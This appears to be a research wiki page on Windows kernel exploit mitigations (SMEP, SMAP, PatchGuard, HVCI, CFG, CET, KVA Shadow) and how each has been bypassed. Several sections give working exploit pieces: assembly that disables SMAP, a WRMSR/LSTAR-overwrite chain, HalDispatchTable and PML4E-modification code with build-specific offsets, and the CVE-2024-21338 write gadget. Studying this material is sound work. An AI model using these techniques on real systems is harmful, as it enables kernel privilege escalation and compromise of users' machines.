Kernel Mitigations
Last updated: 2026-04-11
Related: Mitigations, Primitives, Architecture, Rop
Tags: kernel-mode, smep, smap, kpp, hvci, cet, kcfg
Summary
Windows kernel mitigations form a layered defense that has, over the course of Win8→Win11, systematically closed off entire classes of exploitation technique. This page documents each mitigation: what it protects against, when it was introduced, and the bypass landscape.
SMEP (Supervisor Mode Execution Prevention)
Introduced: Intel Ivy Bridge (2012), enabled by Windows 8
Mechanism: CPU feature (bit 20 of CR4). Prevents ring 0 code from executing pages marked as user-mode (U/S=1 in page table).
Protects against: placing shellcode in user-mode memory and jumping to it from kernel
Bypass History
| Technique | Viability |
|---|---|
| `mov cr4, rax ; ret` gadget to clear bit 20 | Patched by HVCI (intercepts CR4 writes) |
| Map shellcode as kernel page (via pool alloc) | Still viable without HVCI, requires AAW |
| ROP entirely in kernel space | Viable, doesn’t require SMEP bypass |
| Page-fault handler SMEP bypass (2013) | Patched |
Current status: Effective without HVCI. With HVCI, irrelevant — HVCI prevents unsigned kernel code execution regardless.
SMAP (Supervisor Mode Access Prevention)
Introduced: Intel Broadwell (2014), enabled by Windows 10 RS1
Mechanism: Prevents ring 0 from reading/writing user-mode pages (except within stac/clac bracketed regions).
Protects against: kernel code dereferencing user-supplied pointer without ProbeForRead/Write check
Note
SMAP is a defense-in-depth measure. Kernel code should already call ProbeForRead/ProbeForWrite on user-supplied pointers. SMAP enforces this at the hardware level — a forgotten probe causes a fault rather than a silent security bypass.
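The probe requirement can be illustrated with a portable sketch. This is a user-space simulation, not kernel code — `MM_USER_PROBE_ADDRESS` below is the conventional x64 value of `nt!MmUserProbeAddress` and should be treated as an assumption, not a guaranteed constant:

```c
#include <stdint.h>
#include <assert.h>

/* Simulated ProbeForRead logic (portable sketch, not the real ntoskrnl code).
 * MM_USER_PROBE_ADDRESS is the conventional x64 value of nt!MmUserProbeAddress
 * (an assumption; verify on the target). */
#define MM_USER_PROBE_ADDRESS 0x00007FFFFFFF0000ULL

/* Returns 1 if [addr, addr+len) lies entirely below the user/kernel boundary,
 * i.e. the range a real ProbeForRead would accept without raising
 * STATUS_ACCESS_VIOLATION. */
int probe_for_read_ok(uint64_t addr, uint64_t len) {
    if (len == 0) return 1;                        /* zero-length probe always succeeds */
    if (addr + len < addr) return 0;               /* overflow would wrap into kernel space */
    return (addr + len) <= MM_USER_PROBE_ADDRESS;  /* whole range must be user-mode */
}
```

A kernel pointer smuggled in as "user input" fails this check; with SMAP, the same mistake in the other direction (dereferencing a user pointer without `stac`) faults in hardware.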
Bypass: Any code path within stac/clac region still has access. Also: bugs in interrupt/exception handling that run with SMAP disabled.
SMAP Bypass via RFLAGS AC Bit (User-Mode Settable)
A critical and underappreciated bypass: RFLAGS bit 18 (AC flag) controls SMAP and is writable from ring 3.
Setting the AC flag in RFLAGS before issuing a syscall causes SMAP to be disabled for the kernel-mode execution path that follows: the syscall instruction only clears the RFLAGS bits set in IA32_FMASK, and Windows does not include AC in its mask (the full RFLAGS value is saved to R11 for the return path). This means an attacker can disable SMAP entirely from user mode before triggering kernel execution:
; From user-mode, before executing syscall:
pushfq
pop rbx
or rbx, 0x40000 ; set bit 18 (AC flag) — disables SMAP
push rbx
popfq ; load modified RFLAGS
; Now execute syscall — kernel runs with SMAP disabled
This is exploited in LSTAR-overwrite attacks (WRMSR BYOVD class): even though the ROP chain consists of kernel-space gadgets, the user-mode stack (RSP) is still user-space after syscall entry. Without disabling SMAP first, the first ret in the ROP chain would fault accessing the user-space stack. Disabling SMAP via RFLAGS eliminates this constraint.
Note: sysret loads RFLAGS from R11 (saved by syscall). To avoid SMAP remaining disabled after returning to user-mode, the shellcode must restore R11 to the original RFLAGS before sysret.
Mitigation: SMAP bypass via AC flag is inherent to the architecture. The real mitigation is preventing the attacker from reaching kernel execution in the first place (i.e., preventing LSTAR overwrite).
KPP (Kernel Patch Protection / PatchGuard)
Introduced: Windows XP x64 / Server 2003 SP1; present in all 64-bit Windows since Vista
Mechanism: Periodic integrity checks of critical kernel structures: SSDT, IDT, GDT, MSRs (LSTAR, SYSENTER), kernel code pages, object type tables
Protects against: kernel rootkit techniques — hooking SSDT, patching kernel code, replacing IDT entries
How It Works
- Multiple encrypted check routines dispersed throughout kernel
- Runs on random DPC timer (every 5-10 minutes nominally, variable)
- Detection → `KeBugCheckEx(0x109)` (CRITICAL_STRUCTURE_CORRUPTION)
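A toy model of the check cycle, purely illustrative — the real PatchGuard uses encrypted, self-verifying check contexts and obfuscated dispatch, not a plain hash:

```c
#include <stdint.h>
#include <stddef.h>

/* Toy model of PatchGuard's periodic integrity check (illustrative only). */
uint64_t fnv1a64(const uint8_t *p, size_t n) {
    uint64_t h = 0xcbf29ce484222325ULL;              /* FNV-1a 64-bit hash */
    for (size_t i = 0; i < n; i++) { h ^= p[i]; h *= 0x100000001b3ULL; }
    return h;
}

/* "DPC routine": returns 0 if the protected region still matches its baseline
 * hash, nonzero if it was patched (the real KPP would KeBugCheckEx(0x109)). */
int kpp_check(const uint8_t *region, size_t n, uint64_t baseline) {
    return fnv1a64(region, n) != baseline;
}
```

The race-the-check bypass in the list above corresponds to restoring the region before `kpp_check` next runs.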
Bypass Techniques (Historical)
- Patch the patcher: find and NOP out the bugcheck call — requires kernel code write, detected by self-integrity
- Race the check: make change, restore before check runs — timing unreliable
- DPC storm: flood system with DPCs to delay/prevent KPP timer — noisy
- PatchGuard bypass via VT-x: hypervisor intercepts and hides modifications — used by advanced rootkits
- Object Callbacks / Filesystem Minifilters: legitimate kernel extension points that KPP doesn’t check
Current status: Effective against casual hooking. Bypassable with hypervisor-level access. Irrelevant for exploit payloads that use data-only attacks (token steal doesn’t hook anything).
HVCI (Hypervisor-Protected Code Integrity)
Introduced: Windows 10 RS1 (opt-in), Windows 11 (default on supported hardware)
Mechanism: Uses VBS (Virtualization-Based Security) to protect memory page permissions. The secure kernel (running at a higher privilege level than NT kernel) owns the page tables — NT kernel cannot change a page from NX to executable or from read-only to writable.
What HVCI Prevents
- Loading unsigned kernel drivers
- Self-modifying kernel code
- Executing shellcode injected into kernel pool
- Disabling SMEP/SMAP via CR4/CR0 modification
- Disabling WP (Write Protect) bit in CR0 to write to read-only kernel pages
- Writing to kernel code sections (PatchGuard bypass via CR0.WP)
What HVCI Does NOT Prevent
- Data-only exploits (token swap, privilege bits)
- Ring 0 code execution via vulnerable signed driver (BYOVD — Bring Your Own Vulnerable Driver)
- Exploiting bugs within the signed code that already executes
BYOVD (Bring Your Own Vulnerable Driver)
- Load a legitimate but vulnerable signed driver
- Use its vulnerabilities as exploitation primitive
- Examples:
  - `gdrv.sys` (Gigabyte), `mhyprot2.sys` (MiHoYo), `AsrDrv104.sys` (ASRock)
- Microsoft maintains a blocklist (WDAC policy) — keep it current; attackers bypass it by loading older, not-yet-blocked driver versions
- Defense: Block driver loading via WDAC, keep Windows updated for blocklist updates
BYOVD Vulnerability Class: Unrestricted WRMSR
A particularly dangerous BYOVD pattern: drivers that expose an IOCTL calling wrmsr without access control or input validation. Drivers for hardware monitoring, overclocking, and diagnostic tools commonly use wrmsr/rdmsr for legitimate purposes but fail to restrict who can call the IOCTL.
Driver pattern (vulnerable):
// DriverEntry: IoCreateDevice instead of IoCreateDeviceSecure → any user can open device
// IOCTL handler calls wrmsr with user-supplied index and value:
typedef struct {
DWORD Affinity; // CPU affinity mask for KeSetSystemAffinityThreadEx
DWORD MsrIndex; // target MSR (e.g., 0xC0000082 = LSTAR)
DWORD64 Value; // value to write
} WRMSR_INPUT;
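A portable restatement of that input layout (`DWORD` → `uint32_t`, `DWORD64` → `uint64_t`) pins down the buffer the user-mode client must send: 16 bytes, with `Value` landing naturally aligned at offset 8:

```c
#include <stdint.h>
#include <stddef.h>
#include <assert.h>

/* Portable restatement of the WRMSR_INPUT layout above. With this field
 * order, natural alignment produces no padding: Affinity at +0, MsrIndex
 * at +4, Value at +8, total 16 bytes -- the exact IOCTL input buffer the
 * user-mode client must construct. */
typedef struct {
    uint32_t Affinity;   /* CPU affinity mask for KeSetSystemAffinityThreadEx */
    uint32_t MsrIndex;   /* target MSR, e.g. 0xC0000082 (IA32_LSTAR) */
    uint64_t Value;      /* value the driver passes to wrmsr */
} WRMSR_INPUT;

_Static_assert(sizeof(WRMSR_INPUT) == 16, "IOCTL input buffer is 16 bytes");
_Static_assert(offsetof(WRMSR_INPUT, Value) == 8, "Value at offset 8");
```

Reordering the fields (e.g., placing `Value` second) would insert compiler padding and silently desynchronize the client from the driver.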
Exploitation: Point LSTAR (0xC0000082) at attacker shellcode. On next syscall, CPU switches to ring 0 and jumps to attacker address. Full chain:
- Set process/thread priority to Highest — minimize context switches during the exploit window
- Pin the thread to one CPU core via affinity (LSTAR is core-scoped, shared among threads on the same physical core)
- Disable SMAP: set the RFLAGS AC bit (bit 18) from user mode before the `syscall`
- Construct the ROP stack; trigger `syscall` (directly, not via a Windows API) → jumps to LSTAR
- First ROP gadget: `swapgs; iretq` — switches GS to KPCR, restores kernel context via the IRETQ frame
- Second ROP gadget: `mov cr4, rax; ...` — disables SMEP (CR4 bit 20/21 cleared)
- Jump to shellcode: restore LSTAR immediately, steal a token, restore CR4, return via `swapgs; sysret`
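The `swapgs; iretq` stage consumes a five-qword frame that the attacker lays out on the ROP stack. A sketch of building it — the selector and RFLAGS values are the conventional x64 Windows ring-0 ones (assumptions; verify per target):

```c
#include <stdint.h>
#include <assert.h>

/* iretq pops, in order from the top of the stack (lowest address first):
 * RIP, CS, RFLAGS, RSP, SS. The attacker writes these five qwords where
 * the swapgs; iretq gadget will find them. Selector values are the usual
 * x64 Windows kernel ones (KGDT64_R0_CODE = 0x10, KGDT64_R0_DATA = 0x18)
 * -- assumptions to verify against the target. */
void build_iretq_frame(uint64_t *frame, uint64_t next_rip, uint64_t kstack) {
    frame[0] = next_rip;   /* RIP: next ROP stage / gadget */
    frame[1] = 0x10;       /* CS: ring 0 code selector */
    frame[2] = 0x202;      /* RFLAGS: IF=1, reserved bit 1 set, AC clear */
    frame[3] = kstack;     /* RSP after iretq */
    frame[4] = 0x18;       /* SS: ring 0 data selector */
}
```

Note that RFLAGS is reloaded from this frame, so the AC bit set earlier from user mode ends here — any further user-stack access must be complete by this point.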
Notable examples: HP Omen Gaming Hub (CVE-2021-3437 — SentinelOne), various chipset/OC utilities
LSTAR is monitored by KPP: must restore original LSTAR value in shellcode before KPP fires. Restore order: LSTAR first (immediately on shellcode entry, before any other syscall on same core fires), then payload, then CR4 restore.
Defeating HVCI (Research-Level)
- Exploit the secure kernel itself (Hyper-V / VTL1) — highest privilege target
- Exploit firmware/UEFI to modify VBS setup before it initializes
- Find TOCTOU in secure kernel page permission enforcement
CFG (Control Flow Guard)
Introduced: Windows 8.1 Update 3 / Windows 10 (user-mode); extended to kernel (kCFG) in Win10 RS1
Mechanism: Compiler-generated bitmap of valid indirect call targets. Before every indirect call/jmp, generated code checks the target against the bitmap. Invalid target → process termination.
User-Mode CFG
- Enabled per-module via linker flag `/guard:cf`
- Checks via `ntdll!LdrpValidateUserCallTarget` → lookup in the per-process CFG bitmap
- Valid targets are enumerated per-module in the PE load config directory (Guard CF function table) and merged into the process-wide bitmap at load time
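The lookup itself can be sketched as follows, using the bitmap layout commonly described in reverse-engineering writeups — each 64-bit word covers 512 bytes of address space, two state bits per 16-byte chunk. Treat the exact layout as an assumption to verify against the target build:

```c
#include <stdint.h>
#include <assert.h>

/* Sketch of the CFG bitmap lookup done by LdrpValidateUserCallTarget, per
 * public reverse-engineering writeups (layout is an assumption; verify on
 * the target build). Two bits per 16-byte chunk: the even bit means "the
 * 16-byte-aligned address here is a valid target", the odd bit means "any
 * offset within this chunk is valid" (unaligned/suppressed targets). */
int cfg_target_valid(const uint64_t *bitmap, uint64_t target) {
    uint64_t word = bitmap[target >> 9];      /* one qword per 512 bytes   */
    uint64_t bit  = (target >> 3) & 0x3F;     /* 2 bits per 16-byte chunk  */
    if (target & 0xF)                         /* unaligned target must hit */
        bit |= 1;                             /*   the odd ("any") bit     */
    return (word >> bit) & 1;
}
```

The "write to bitmap itself" bypass in the table below amounts to flipping one of these bits with an arbitrary write before the dispatch.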
kCFG (Kernel CFG)
- Similar principle for kernel indirect calls
- Enabled in ntoskrnl and system DLLs
- Without HVCI: only “Kernel-mode Address Check” — verifies that the indirect call target is within kernel address range (top bit = 1). User-mode addresses are rejected.
- With HVCI: full kCFG — verifies target is a valid CFG-enumerated function entry point within the kernel
- Win32k syscall filter + kCFG significantly limits kernel vtable-based exploitation
CFG Bypasses
| Technique | Notes |
|---|---|
| Write to bitmap itself (if AAW before CFG check) | Requires write before dispatch |
| Call a valid CFG target that has exploitable semantics | “CFG-compliant” ROP — find valid target that enables further control |
| JIT-compiled pages / ACG interaction | JIT engines need exception; browsers use ACG to prevent |
| Modules loaded without CFG | Some system DLLs still not CFG-enabled; use their exports |
| SetProcessValidCallTargets API | Legitimate API to mark pages as valid CFG targets — abused by some exploits |
| Data-only attack via AAW kernel gadget | Route indirect call to a kernel function that performs a write; kCFG never evaluates a CFG-invalid target because no indirect call to attacker-controlled code occurs — the gadget itself is a valid CFG target. CVE-2024-21338 pattern. |
kCFG Bypass via Kernel ROP Gadget (without HVCI)
When only the “Kernel-mode Address Check” is enforced (no HVCI), pointing an overwritten function pointer at a kernel-space jmp <reg> gadget passes the check while redirecting execution to a user-controlled register. The register must hold the shellcode address loaded beforehand from user mode.
Standard technique — HalDispatchTable+0x8 overwrite:
- `HalDispatchTable+0x8` normally holds a pointer to `HaliQuerySystemInformation`
- `NtQueryIntervalProfile(2, &dummy)` triggers an indirect call through `HalDispatchTable+0x8`
- Overwrite `HalDispatchTable+0x8` with the address of a `jmp r13` gadget in ntoskrnl
// rp++ to find gadget: .\rp-win.exe -f ntoskrnl.exe -r 5 > ntoskrnl.txt
// 0x14080d5db: jmp r13 ; (1 found) → offset = 0x80d5db
// HalDispatchTable+0x8 offset from kernel base = 0xc00a68 (Win10 22H2; verify each build)
PVOID origHDT8 = ArbitraryRead(hDevice, (PVOID)(kernelBase + 0xc00a68));
PVOID jmpR13 = (PVOID)(kernelBase + 0x80d5db);
ArbitraryWrite(hDevice, (PVOID)(kernelBase + 0xc00a68), &jmpR13);
- Before triggering, store shellcode address in R13 using inline assembly stub:
; SetR13.asm (assembled to 4 bytes: 0x49 0x89 0xcd 0xc3)
SetR13:
mov r13, rcx ; Windows x64 ABI: 1st arg in RCX
ret
unsigned char rawSetR13[] = { 0x49, 0x89, 0xcd, 0xc3 };
PVOID execSetR13 = VirtualAlloc(NULL, 4, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(execSetR13, rawSetR13, 4);
((void(*)(PVOID))execSetR13)(shellcode); // R13 = shellcode address
R13–R15 and RSI survive from `NtQueryIntervalProfile` through to `HaliQuerySystemInformation` without modification — confirmed via a WinDbg register experiment (overwrite the registers at an `NtQueryIntervalProfile` breakpoint, observe them at a `HaliQuerySystemInformation` breakpoint).
After the shellcode returns, restore `HalDispatchTable+0x8`:
ArbitraryWrite(hDevice, (PVOID)(kernelBase + 0xc00a68), &origHDT8);
Note: Offsets 0xc00a68 (HalDispatchTable+0x8) and 0x80d5db (jmp r13) are Win10 22H2-specific. Use WinDbg or rp++ against the target build to find the correct values.
kCFG Bypass via Data-Only AAW Gadget (DbgkpTriageDumpRestoreState pattern)
When a vulnerability routes execution to an attacker-controlled kernel function pointer, but SMEP + kCFG block both user-mode and arbitrary kernel-address targets, the solution is to point the callback at a legitimate kernel function that performs a controlled write rather than jumping to attacker shellcode. kCFG validates the callback target (which is now a valid CFG-enumerated function) and SMEP is never triggered because the called code is kernel-space.
CVE-2024-21338 (appid.sys) example:
The vulnerable IOCTL performs an untrusted pointer dereference (an attacker-controlled indirect call). The usual target for this pattern, SeSetAccessStateGenericMapping (a popular gadget in type-confusion exploits), requires a first-argument struct of at least 0x50 bytes, but the IOCTL input buffer is only 0x20. Searching for alternatives turned up nt!DbgkpTriageDumpRestoreState — it writes the value at input+0x10 to *(*(input+0x00) + 0x2078):
Gadget: nt!DbgkpTriageDumpRestoreState
Offset from ntoskrnl base (Win11): 0x7f06e0
Effect: *(ImageContext + 0x2078) = CallbackTable
i.e., *(param1 + 0x2078) = *(input + 0x10)
This gives an 8-byte kernel AAW primitive from a single IOCTL trigger. The written value is controlled by the CallbackTable field — a VirtualAlloc-returned page-aligned pointer serves double duty: it is a valid non-null pointer (passes any non-null check in the kernel) and its value carries the desired write payload:
- `VirtualAlloc((VOID*)0x100000, ...)` → value = `0x0000000000100000`; low byte = `0x00` → suitable for a PreviousMode overwrite
- Same value: bit 20 = 1 → `0x100000` = the SeDebugPrivilege bitmask → suitable for a `_SEP_TOKEN_PRIVILEGES` overwrite
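The gadget's effect can be simulated in user space — the field offsets below are the ones quoted above, and the real write of course happens in kernel mode:

```c
#include <stdint.h>
#include <stdlib.h>
#include <assert.h>

/* User-space simulation of the gadget's semantics. Offsets are the ones
 * quoted above for nt!DbgkpTriageDumpRestoreState: ImageContext is read
 * from input+0x00, CallbackTable from input+0x10, and the write lands at
 * ImageContext + 0x2078. */
typedef struct {
    uint8_t  *ImageContext;    /* +0x00: write target base (attacker-chosen) */
    uint64_t  Reserved;        /* +0x08: unused here */
    uint64_t  CallbackTable;   /* +0x10: value to write (attacker-chosen) */
} TRIAGE_INPUT;

/* The 8-byte arbitrary write: *(param1 + 0x2078) = *(input + 0x10). */
void triage_dump_restore_state(TRIAGE_INPUT *in) {
    *(uint64_t *)(in->ImageContext + 0x2078) = in->CallbackTable;
}
```

Pointing `ImageContext` at `target - 0x2078` turns this into a write-what-where, with "what" constrained to the dual-purpose VirtualAlloc pointer described above.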
See CVE-2024-21338 for the complete exploit chain.
CET (Control-flow Enforcement Technology)
Introduced: Intel Tiger Lake (2020); Windows 10 20H1 (user-mode opt-in); Windows 11 (broader enforcement)
Mechanism: Hardware shadow stack (SS). On call, CPU pushes return address to shadow stack (separate, read-only from ring 3). On ret, CPU compares popped return address against shadow stack — mismatch → #CP exception.
CET Shadow Stack (SS)
- Defeats: classic stack-based ROP chains by invalidating return-address overwrites
- Shadow stack pages: set in page table as shadow-stack pages — not writable by normal stores
- Shadow stack pointer held in the `IA32_PL3_SSP` MSR
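A toy model of the shadow-stack check — illustrative only, since the real mechanism is in hardware and shadow-stack pages are not writable by normal stores:

```c
#include <stdint.h>
#include <assert.h>

/* Toy model of a CET shadow stack: on call, both stacks receive the return
 * address; on ret, the two are compared. A mismatch corresponds to the #CP
 * (control protection) exception the CPU would raise. */
typedef struct { uint64_t data[64]; int top; } stack_t;

void cet_call(stack_t *normal, stack_t *shadow, uint64_t ret_addr) {
    normal->data[normal->top++] = ret_addr;   /* writable by the program  */
    shadow->data[shadow->top++] = ret_addr;   /* HW-managed, write-protected */
}

/* Returns the return address, or 0 to model #CP on mismatch. */
uint64_t cet_ret(stack_t *normal, stack_t *shadow) {
    uint64_t a = normal->data[--normal->top];
    uint64_t b = shadow->data[--shadow->top];
    return (a == b) ? a : 0;                  /* mismatch -> #CP */
}
```

A stack-buffer overflow can rewrite `normal` but not `shadow`, so the first corrupted `ret` of a classic ROP chain faults instead of pivoting.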
CET IBT (Indirect Branch Tracking)
- Every valid indirect call target must begin with an `ENDBR64`/`ENDBR32` instruction
- CPU tracks a “wait for ENDBR” state after an indirect call/jmp
- Branching to a non-ENDBR location → `#CP` exception
- Complements CFG at the hardware level
CET Bypasses (Research)
- JOP (Jump-Oriented Programming): if IBT not enforced, jump chains without call/ret
- Shadow stack leak: if you can read shadow stack address, you can attempt targeted corruption (very hard, SS pages write-protected at hardware level)
- ENDBR gadgets: with IBT, “gadgets” must begin with ENDBR64 — limits but doesn’t eliminate ROP-equivalent chains
- longjmp/setjmp corruption: `setjmp` saves/restores the shadow stack pointer — some implementations are vulnerable
- Exception handler manipulation: `__except` blocks involve shadow stack management — audit for manipulation opportunities
KVA Shadow (Kernel Virtual Address Shadow / KPTI)
Introduced: Windows 10 RS4 (1803), in response to Meltdown (CVE-2017-5754)
Mechanism: Dual PML4 tables. The “shadow” PML4 used in user mode has kernel pages mapped with the XD (Execute Disable) bit set and the U/S bit cleared, effectively making them non-executable and inaccessible from user mode. The full PML4 used in kernel mode has the normal mappings. A CR3 switch occurs on every syscall/interrupt boundary.
What KVA Shadow Adds on Top of SMEP
- SMEP prevents executing user-mode pages from ring 0 (U/S=1 pages blocked).
- KVA Shadow additionally prevents executing kernel-mapped user pages from ring 0: even if you allocate a page with `VirtualAlloc(PAGE_EXECUTE_READWRITE)`, its PML4E in the kernel CR3 has XD=1 — the kernel cannot execute it, even where SMEP alone would have been bypassed (since the page is user-mode).
- Net effect: user-mode shellcode is not executable in kernel mode even when SMEP is defeated.
PML4 Self-Reference Entry Randomization (Win10 1607+)
A critical subtlety for bypass: the PML4 self-reference entry (the recursive PML4 entry that allows virtual address computation of page table entries) is at a random index (range 0x100–0x1FF) since Win10 1607. Previously it was fixed at 0x1ED.
This matters because calculating PTE virtual addresses requires knowing the self-reference index:
// PTE virtual address for any VA uses the self-ref index at bits 47:39
pte_addr = ((VA >> 9) & 0x7FFFFFFFF8) + pml4_self_ref_base;
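A runnable equivalent of that computation, parameterized by the leaked self-ref base:

```c
#include <stdint.h>
#include <assert.h>

/* Equivalent of nt!MiGetPteAddress, parameterized by the leaked self-ref
 * base (the value read at nt!MiGetPteAddress+0x13). Shifting the VA right
 * by 9 maps each 4 KiB page to its 8-byte PTE slot, the mask keeps bits
 * 47:3 (index * 8), and the base contributes the self-ref prefix plus
 * sign extension. */
uint64_t mi_get_pte_address(uint64_t va, uint64_t pte_base) {
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}
```

With the example base `0xFFFFEC0000000000` leaked above, VA 0 maps to the base itself and each subsequent page adds 8 bytes.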
The current self-reference base is stored at nt!MiGetPteAddress+0x13:
kd> dq nt!MiGetPteAddress+0x13 L1
fffff802`45c6b573 ffffec00`00000000 // self-ref base = 0xFFFFEC0000000000
Extract PML4 index from the leaked value:
unsigned int ExtractPml4Index(PVOID address) {
return ((uintptr_t)address >> 39) & 0x1ff; // bits 47:39
}
Offset of MiGetPteAddress+0x13 from kernel base: 0x26b573 (Win10 22H2 — always verify against target build with WinDbg).
KVA Shadow Bypass via PML4E Manipulation
The standard bypass on Win10 22H2 (without HVCI) uses an AAR/AAW primitive to directly modify the shellcode’s PML4 entry:
Step 1 — Leak self-ref entry (via AAR at kernelBase + 0x26b573):
PVOID pteBase = ArbitraryRead(hDevice, (PVOID)(kernelBase + MiGetPteAddress13_Offset));
unsigned int selfRefIndex = ExtractPml4Index(pteBase);
Step 2 — Calculate shellcode’s PML4E virtual address:
PVOID CalculatePml4VirtualAddress(unsigned int selfRefIndex, unsigned int pml4Index) {
uintptr_t addr = 0xffff;
addr = (addr << 9) | selfRefIndex; // PML4 index → self-ref
addr = (addr << 9) | selfRefIndex; // PDPT index
addr = (addr << 9) | selfRefIndex; // PD index
addr = (addr << 9) | selfRefIndex; // PT index
addr = (addr << 0xC) | (pml4Index * 8); // byte offset of the target PML4E within the PML4 page
return (PVOID)addr;
}
unsigned int shellcodePml4Index = ExtractPml4Index(shellcode);
PVOID pml4EntryVA = CalculatePml4VirtualAddress(selfRefIndex, shellcodePml4Index);
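As a cross-check, the PML4E virtual address can be derived independently: with a recursive mapping, the PML4 table itself appears at the VA whose four indices all equal the self-ref index. Using the example base `0xFFFFEC0000000000` from the leak above (self-ref index 0x1D8), both derivations agree:

```c
#include <stdint.h>
#include <assert.h>

/* Independent derivation of the PML4E VA: the self-ref base already encodes
 * the self-ref index at bits 47:39 (plus sign extension), so the PML4 table
 * VA is base | (s<<30) | (s<<21) | (s<<12), and the entry for a given PML4
 * index sits idx*8 bytes into that page. Should match the document's
 * CalculatePml4VirtualAddress for the same inputs. */
uint64_t pml4e_va(uint64_t self_ref_base, uint32_t s, uint32_t idx) {
    return self_ref_base
         | ((uint64_t)s << 30)    /* PDPT index = self-ref */
         | ((uint64_t)s << 21)    /* PD index   = self-ref */
         | ((uint64_t)s << 12)    /* PT index   = self-ref */
         | ((uint64_t)idx * 8);   /* byte offset of the PML4E */
}
```

For base `0xFFFFEC0000000000` (s = 0x1D8) and index 0 this yields `0xFFFFEC763B1D8000`, the same value the shift-based function above produces.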
Step 3 — Leak then modify PML4E (via AAR + AAW):
uintptr_t origEntry = (uintptr_t)ArbitraryRead(hDevice, pml4EntryVA);
uintptr_t modEntry = origEntry;
modEntry &= ~((uintptr_t)1 << 2); // Clear bit 2: U/S → kernel mode (defeats SMEP)
modEntry &= ~((uintptr_t)1 << 63); // Clear bit 63: XD=0 → executable (defeats KVA Shadow)
ArbitraryWrite(hDevice, pml4EntryVA, &modEntry);
After: !pte shows ---DA--KWEV instead of ---DA--UW-V — kernel mode (K) and executable (E).
Step 4 — Restore after shellcode execution (required to avoid KPP-triggered BSOD):
ArbitraryWrite(hDevice, pml4EntryVA, &origEntry);
KVASCODE Section (Trampoline Region)
KPTI requires a region of kernel code to be mapped in both the user-mode and kernel-mode page tables — the KVASCODE section. This section contains the syscall/interrupt entry stubs that must execute before the CR3 switch occurs (they run before the full kernel mapping is active).
Critical implications for exploitation:
- With KPTI active, ROP gadgets must be sourced from the KVASCODE section only until after the CR3 switch. Gadgets from the rest of ntoskrnl.exe are not mapped in the user-mode CR3 and will page-fault.
- After the CR3 swap (loading the full kernel `DirectoryTableBase`), gadgets from the full ntoskrnl.exe and all loaded drivers become accessible.
- `KiSystemCall64Shadow` lives in KVASCODE. Its first instructions perform: `swapgs`, test KPTI flag, load kernel CR3 (if KPTI enabled), load kernel RSP, then jump into the middle of `KiSystemCall64`.
KiSystemCall64Shadow Internals
syscall → RIP = LSTAR (→ KiSystemCall64Shadow, in KVASCODE)
swapgs ; swap IA32_GS_BASE (user TEB) ↔ IA32_KERNEL_GS_BASE (KPCR)
bt [KPTI flag] ; check if KVAS enabled for this process
mov cr3, DirectoryTableBase ; load kernel page table (if KPTI enabled)
mov rsp, KernelStack ; switch to kernel stack
→ jmp KiSystemServiceUser (inside KiSystemCall64)
Return path (KiKernelSysretExit):
mov rbp, UserDirectoryTableBase ; get user CR3
mov cr3, rbp ; restore user page table
; restore user RSP
swapgs ; restore user GS
sysret ; RIP = RCX (saved by syscall), RFLAGS = R11 (saved by syscall)
KPTI Disabled for Administrator Processes
An important behavioral detail: KPTI is disabled for processes running with administrative privileges. In _KPROCESS, UserDirectoryTableBase is set to 1 (invalid) and AddressPolicy = 1 when KPTI is disabled. This means:
- Admin-privilege exploits don’t need to bypass KPTI (kernel memory is already mapped in their CR3)
- ROP gadgets can be sourced from the entire ntoskrnl.exe, not just KVASCODE
- This significantly simplifies LSTAR-overwrite exploit development when starting from admin
KVA Shadow vs HVCI
If HVCI is active, the secure kernel owns the page tables and the NT kernel cannot modify PML4 entries — this bypass is blocked. PML4 modification requires HVCI to be absent.
Reference
- Source: ommadawn46, “Windows Kernel Exploitation: HEVD on Windows 10 22H2” (2024)
- GitHub: ommadawn46/HEVD-Exploit-Win10-22H2-KVAS
KASLR (Kernel Address Space Layout Randomization)
Introduced: Windows 8
Mechanism: Randomizes base address of kernel, HAL, and drivers at boot
Entropy: Initially weak (~8 bits = 256 slots). Improved in Win10+ with finer granularity.
Info Leak Mitigations (Win10+)
NtQuerySystemInformationrestricted for medium-IL and below for certain classes- GDI kernel pointer leaks patched systematically since RS1
NtGdiGetServerMetaFileBitsand similar patched- Token/handle address leaks in various APIs patched
Remaining Leak Surfaces (as of 2024)
- `NtQuerySystemInformation(SystemModuleInformation)` — requires `SeDebugPrivilege` or elevation
- Timing attacks (hardware-assisted)
- Bugs in new kernel features (graphics, virtualization, new drivers)
Safe Unlinking
Introduced: Windows 8
Mechanism: Pool free-list unlink validates Flink->Blink == current and Blink->Flink == current before unlink. Broken list = bug check.
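A minimal sketch of the check — the kernel's version operates on pool free-list `LIST_ENTRY`s and bug-checks on mismatch rather than returning an error:

```c
#include <stdint.h>
#include <stddef.h>
#include <assert.h>

/* Sketch of safe unlinking: before removing an entry from a doubly linked
 * list, verify both neighbors still point back at it. A mismatch means the
 * list was corrupted (e.g., by a pool overflow), and the kernel bug-checks
 * instead of performing the attacker-controlled write that classic unlink
 * exploitation relied on. */
typedef struct list_entry {
    struct list_entry *Flink, *Blink;
} LIST_ENTRY;

int safe_unlink(LIST_ENTRY *e) {
    if (e->Flink->Blink != e || e->Blink->Flink != e)
        return 0;                        /* corruption detected: bug check */
    e->Blink->Flink = e->Flink;          /* ordinary unlink otherwise */
    e->Flink->Blink = e->Blink;
    return 1;
}
```

Without the two comparisons, an overflow that set `Flink`/`Blink` to chosen values would turn the unlink into an arbitrary write.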
Virtual Secure Mode (VBS)
Introduced: Windows 10 RS1 (optional); Windows 11 (default on compatible hardware)
Mechanism: Uses CPU virtualization to create a higher-privilege “secure world” (VTL1) that hosts the Secure Kernel and LSAISO. NT kernel runs in VTL0 and cannot access VTL1 memory.
VBS-Enabled Features
- HVCI: code integrity enforcement
- Credential Guard: LSASS isolation in VTL1
- WDAG (Windows Defender Application Guard): browser in VM
- Secured-core PC features
Mitigation Coverage Summary
| Attack | Win7 | Win8/8.1 | Win10 RS1 | Win10 1803+ | Win10 20H2 | Win11 |
|---|---|---|---|---|---|---|
| User shellcode in kernel | SMEP (HW) | SMEP | SMEP+CFG | SMEP+KVA Shadow+CFG | SMEP+KVA Shadow+CFG+CET | SMEP+KVA Shadow+CFG+CET+HVCI |
| SSDT hooking | KPP | KPP | KPP+HVCI(opt) | KPP+HVCI(opt) | KPP+HVCI | KPP+HVCI |
| ROP chains | - | - | CFG | CFG | CFG+CET(opt) | CFG+CET |
| Pool header overwrite | - | Safe unlink | Safe unlink | Segment Heap | Segment Heap | Segment Heap |
